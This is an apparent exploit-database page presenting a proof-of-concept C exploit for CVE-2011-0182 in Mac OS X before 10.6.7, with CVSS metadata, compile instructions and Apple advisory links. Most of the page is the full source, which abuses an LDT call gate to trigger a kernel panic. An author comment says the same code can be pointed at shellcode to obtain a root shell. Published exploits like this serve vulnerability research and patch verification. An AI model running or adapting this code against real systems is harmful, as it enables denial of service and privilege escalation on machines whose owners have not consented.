Mac OS X < 10.6.7 Kernel Panic Exploit

2011-10-01 / 2011-10-02
Credit: hkpco
Risk: High
Local: Yes
Remote: No
CWE: CWE-20


CVSS Base Score: 7.2/10
Impact Subscore: 10/10
Exploitability Subscore: 3.9/10
Exploit range: Local
Attack complexity: Low
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

/* Mac OS X < 10.6.7 Kernel Panic Exploit CVE-2011-0182, Proof Of Concept Code Author - Chanam Park (hkpco) Date - 2011. 06 Contact - chanam.park@hkpco.kr , http://hkpco.kr , @hkpco Thanks for inspiration / x82, riaf. */ // Compile: gcc -o CVE-2011-0182_PoC CVE-2011-0182_PoC.c -m32 #include <architecture/i386/table.h> #include <i386/user_ldt.h> #include <unistd.h> #include <stdio.h> #include <stdlib.h> #include <string.h> void dummy_func( void ) { asm volatile( ".byte 0xff" ); } int main( void ) { int ret; union ldt_entry cgate, cgate2; char dummy[128] = {0x00,}; cgate.call_gate.offset00 = (unsigned int)dummy_func & 0xffff; cgate.call_gate.offset16 = ((unsigned int)dummy_func >> 16) & 0xffff; // You can input shellcode address value here to get the root shell. /* I got the root shell before. But, It was tested on Hackintosh for AMD. :-p The normal system has a little different environment. I have no time for this anymore because of my summer break is over. So.. Good Luck! */ cgate.call_gate.argcnt = 0; cgate.call_gate.type = 0xc; // DESC_CALL_GATE cgate.call_gate.dpl = 3; cgate.call_gate.present = 1; cgate.call_gate.seg.rpl = 0; cgate.call_gate.seg.ti = 0; cgate.call_gate.seg.index = 16; cgate2.call_gate.offset00 = 0x0; cgate2.call_gate.seg.rpl = 0; cgate2.call_gate.seg.ti = 0; cgate2.call_gate.seg.index = 0; cgate2.call_gate.argcnt = 0; cgate2.call_gate.type = 0; cgate2.call_gate.dpl = 0; cgate2.call_gate.present = 1; cgate2.call_gate.offset16 = 0x0; printf( "// coded by Chanam Park (hkpco)\n\n" ); ret = i386_set_ldt( LDT_AUTO_ALLOC, &cgate, 1 ); printf( "Selector Number in LDT <1>: 0x%x\n", ret ); ret = i386_set_ldt( LDT_AUTO_ALLOC, &cgate2, 1 ); printf( "Selector Number in LDT <2>: 0x%x\n\n", ret ); printf( "If you run this program, it can possibly cause \"Kernel Panic\".\n" ); printf( "The program will be continued when you input any value.\n" ); printf( "-> " ); fflush(stdout); scanf( "%s", dummy ); asm volatile( "lcall $0x3f, $0x0" ); // Trigger return 0; }

References:

http://support.apple.com/kb/HT4581
http://lists.apple.com/archives/security-announce/2011/Mar/msg00006.html


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top